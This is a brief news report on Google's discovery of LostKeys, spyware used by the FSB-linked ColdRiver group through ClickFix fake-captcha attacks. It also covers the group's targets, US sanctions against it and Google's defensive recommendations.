Google has announced (via Android Headlines) the discovery of a new Russian spyware named LostKeys, utilized by the hacker group ColdRiver, linked to the Russian FSB. This software is designed to steal files and system data from Western organizations.

According to the Google Threat Intelligence Group (GTIG), LostKeys is employed in specialized ClickFix attacks based on social engineering, beginning with a fake captcha. Victims are tricked into executing malicious PowerShell scripts, which pave the way for downloading and executing additional malware. The primary objective is to install LostKeys, operating like a digital vacuum cleaner, extracting files, directories, and system information. Hackers also employ other malicious software, including SPICA, to acquire documents.

The ColdRiver group has been active since 2017 and is known by other names such as Star Blizzard and Callisto Group. Reports indicate that it has intensified its activities in recent years, particularly following Russia's invasion of Ukraine. The group specializes in cyberespionage, targeting government and defense agencies, think tanks, politicians, journalists, and NGOs.

The United States has already imposed sanctions against certain members of the group and announced a reward of $10 million for information leading to their arrest.

Google experts emphasize the need for enhanced cybersecurity, particularly for organizations that may become potential targets of ColdRiver attacks. They recommend utilizing Google's advanced protection and regularly updating security systems to prevent similar threats.